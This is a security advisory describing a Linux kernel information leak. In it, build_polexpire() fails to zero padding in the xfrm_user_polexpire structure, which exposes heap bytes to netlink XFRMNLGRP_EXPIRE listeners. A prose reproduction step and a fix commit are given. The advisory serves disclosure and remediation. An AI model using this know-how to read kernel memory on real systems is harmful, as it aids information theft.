Linux Kernel Trailing Padding Memory Leak Vulnerability in XFRM Policy Expiration Handling

A vulnerability in the Linux kernel's handling of XFRM policy expiration can lead to unintentional memory leaks. The issue arises in the 'build_polexpire()' function, which fails to clear trailing padding bytes in the 'xfrm_user_polexpire' structure. These uninitialized bytes, originating from heap allocation, are transmitted to userspace via netlink multicast, potentially exposing sensitive kernel heap memory contents. This vulnerability affects several versions of the Linux kernel.

Impact

The vulnerability allows for the unintentional leakage of kernel heap memory to userspace, which could be exploited to read sensitive information from the kernel memory.

Reproduction

The vulnerability can be reproduced by using a version of the Linux kernel that includes the unpatched 'build_polexpire()' function. When this function is called, it will send uninitialized padding bytes from the 'xfrm_user_polexpire' structure to userspace, leaking kernel heap memory contents. This can be observed by monitoring the netlink multicast to 'XFRMNLGRP_EXPIRE' listeners, where the leaked memory can be accessed.

Remediation

Users can upgrade to the latest version of the Linux kernel where this vulnerability has been addressed. The specific commit that fixes this issue is '71a98248c63c535eaa4d4c22f099b68d902006d0', which is available in the Linux kernel stable tree.